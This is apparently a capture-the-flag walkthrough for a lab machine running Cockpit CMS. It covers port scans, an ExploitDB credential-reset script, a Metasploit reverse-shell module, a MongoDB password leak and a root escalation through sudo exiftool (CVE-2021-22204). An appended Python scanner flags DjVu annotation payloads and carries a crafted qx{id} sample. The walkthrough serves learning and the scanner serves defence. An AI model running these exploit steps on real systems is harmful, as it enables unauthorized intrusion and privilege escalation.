Port scanning

nmap --min-rate=10000 -p- 10.10.239.126
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 10:49 UTC
Nmap scan report for ip-10-10-239-126.eu-west-1.compute.internal (10.10.239.126)
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:11:25:0E:D4:A9 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 7.23 seconds
nmap -sV -sC -sT -O -p22,80 10.10.239.126
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-19 10:49 UTC
Nmap scan report for ip-10-10-239-126.eu-west-1.compute.internal (10.10.239.126)
Host is up (0.00045s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f25f9402325cd298b28a9d982f549e4 (RSA)
| 256 0af429ed554319e773a7097930a8491b (ECDSA)
|_ 256 2f43ada3d15b648633075d94f9dca401 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
MAC Address: 02:11:25:0E:D4:A9 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (99%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds

Getshell

Browsing to port 80 shows a CMS called Cockpit. Right-click and view the page source: one line gives away the version, 0.11.1.

<link href="/assets/app/css/style.css?ver=0.11.1" type="text/css" rel="stylesheet">
locate multiple/webapps/50185.py
cp /usr/share/exploitdb/exploits/multiple/webapps/50185.py .
python 50185.py

Running the ExploitDB script 50185.py resets the credentials of the skidy and admin users:

Username : skidy
Password : p|x,ku=o`,
Username : admin
Password : ]N()#P6|b_

After logging in I looked around briefly; there is a file upload point, but I did not try it. Instead, try a one-shot with Metasploit. Note that `use 0` picks the first hit of `search cockpit`; confirm it is the Cockpit CMS RCE module (exploit/multi/http/cockpit_cms_rce) rather than trusting the index, since the ordering depends on the installed module set.

search cockpit

use 0

set USER admin

set RHOSTS <target IP>

set LHOST tun0

set LPORT 443

run

This gets us a shell.

Lateral movement

Following the room hint, query the MongoDB database. At first I typed the database query command wrong and could not find the database.

> show dbs
admin          (empty)
dbdb           (empty)
local          0.078GB
sudousersbak   0.078GB
test           (empty)
> use sudousersbak
> show collections
> db.flag.find().pretty()

That gives the database flag. Querying the user collection gives the password for the user stux, and we pivot to that user with it.

> db.user.find().pretty()
{
    "_id" : ObjectId("60a89d0caadffb0ea68915f9"),
    "name" : "p4ssw0rdhack3d!123"
}
{ "_id" : ObjectId("60a89dfbaadffb0ea68915fa"), "name" : "stux" }

Privilege escalation

sudo -l

This shows exiftool can be run as root. That alone lets us write arbitrary files to arbitrary directories as root, so we could simply write root.txt somewhere readable; but the point of the room is to escalate to a root shell.

The installed version is 12.05, which falls inside the CVE-2021-22204 range (ExifTool 7.44 through 12.23; fixed in 12.24): improper handling of DjVu annotation data lets a crafted image execute arbitrary commands as whoever runs exiftool, here root.

After trying a lot of exploits and hitting many problems, I found one that takes a command and generates a jpg file:

https://github.com/se162xg/CVE-2021-22204/blob/main/craft_a_djvu_exploit.sh

Transfer it to the target (renamed exp.sh here), generate the image with the command to run, and have root's exiftool parse it:

bash exp.sh 'sudo su'
sudo /usr/local/bin/exiftool delicate.jpg

Once it runs, we are root.
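Two checks a practitioner wants around this step, as an added example (not code from the writeup or from the linked exploit script): whether a given ExifTool version is inside the CVE-2021-22204 range, and whether a file such as the generated delicate.jpg carries a DjVu document whose annotation looks like a command payload. The DjVu layout walked here is the public IFF-style format ('AT&T' + 'FORM' + big-endian length + 'DJVU', then chunks of 4-byte id + big-endian length + data, padded to even size). The sample files and the suspicious-token list are constructed for this example; the payload annotation copies the shape of the public proof of concept with a harmless placeholder command.

```python
"""Triage helpers for the sudo-exiftool path (added example)."""
import re
import struct
import subprocess

VULN_FIRST = (7, 44)    # first affected ExifTool release
VULN_FIXED = (12, 24)   # first fixed release


def version_tuple(v: str) -> tuple:
    return tuple(int(p) for p in v.strip().split('.'))


def exiftool_vulnerable(version: str) -> bool:
    """True if version is in [7.44, 12.24), i.e. affected by CVE-2021-22204."""
    return VULN_FIRST <= version_tuple(version) < VULN_FIXED


def installed_exiftool_version(binary: str = 'exiftool'):
    """Return the output of `exiftool -ver`, or None if it is not installed."""
    try:
        out = subprocess.run([binary, '-ver'], capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return None
    return out.stdout.strip() or None


DJVU_MAGIC = b'AT&TFORM'
# Heuristic (constructed for this example): tokens that only make sense if the
# annotation is trying to break out of a quoted string and run Perl code.
SUSPICIOUS = re.compile(rb'qx[{(\[/|]|`|\bsystem\s*\(|\bexec\s*\(|\\"')


def iter_djvu_chunks(blob: bytes):
    """Yield (chunk_id, data) for each top-level chunk of the first DjVu FORM in blob.
    The magic is searched for anywhere, since the exploit embeds DjVu inside a JPEG."""
    start = blob.find(DJVU_MAGIC)
    if start < 0:
        return
    pos = start + len(DJVU_MAGIC)
    if pos + 8 > len(blob):
        return
    form_len = struct.unpack('>I', blob[pos:pos + 4])[0]
    form_type = blob[pos + 4:pos + 8]
    if form_type not in (b'DJVU', b'DJVM'):
        return
    end = min(len(blob), pos + 4 + form_len)
    pos += 8
    while pos + 8 <= end:
        cid = blob[pos:pos + 4]
        clen = struct.unpack('>I', blob[pos + 4:pos + 8])[0]
        yield cid, blob[pos + 8:pos + 8 + clen]
        pos += 8 + clen + (clen & 1)   # chunks are padded to an even length


def scan_for_djvu_payload(blob: bytes) -> dict:
    """Report the DjVu chunks in blob and any annotation that looks like code."""
    report = {'has_djvu': False, 'chunks': [], 'suspicious': []}
    for cid, data in iter_djvu_chunks(blob):
        report['has_djvu'] = True
        report['chunks'].append(cid.decode('latin-1'))
        if cid == b'ANTa' and SUSPICIOUS.search(data):
            report['suspicious'].append(data.decode('latin-1', 'replace'))
        elif cid == b'ANTz':
            # BZZ-compressed annotation: not decoded here, flag it for manual review.
            report['suspicious'].append('<ANTz: compressed annotation, inspect manually>')
    return report


def build_djvu(chunks) -> bytes:
    """Assemble a minimal single-page DjVu FORM from (id, data) pairs (for samples)."""
    body = b''
    for cid, data in chunks:
        body += cid + struct.pack('>I', len(data)) + data + (b'\x00' if len(data) & 1 else b'')
    return DJVU_MAGIC + struct.pack('>I', 4 + len(body)) + b'DJVU' + body


# Constructed samples: a JPEG-like prefix followed by an embedded DjVu whose
# annotation escapes the quoted string and shells out via qx{} (placeholder
# command), and a clean DjVu with an ordinary annotation.
SAMPLE_PAYLOAD = b'\xff\xd8\xff\xe1' + build_djvu([
    (b'INFO', b'\x00' * 10),
    (b'ANTa', b'(metadata (Copyright "\\" . qx{id} . \\""))'),
])
SAMPLE_CLEAN = build_djvu([
    (b'INFO', b'\x00' * 10),
    (b'ANTa', b'(metadata (Author "alice"))'),
])

if __name__ == '__main__':
    import sys
    ver = installed_exiftool_version()
    print('installed exiftool:', ver, 'vulnerable:', ver and exiftool_vulnerable(ver))
    blobs = [open(p, 'rb').read() for p in sys.argv[1:]] or [SAMPLE_PAYLOAD, SAMPLE_CLEAN]
    for b in blobs:
        print(scan_for_djvu_payload(b))
```

Run it with no arguments to check the local exiftool and the two samples, or pass file paths (for example the generated delicate.jpg) to scan real images. On the defensive side the same scanner makes a reasonable upload filter or triage check: a JPEG that contains a DjVu FORM at all is already unusual, and an ANTa chunk with `qx{` or an escaped quote in it is not something a legitimate image produces.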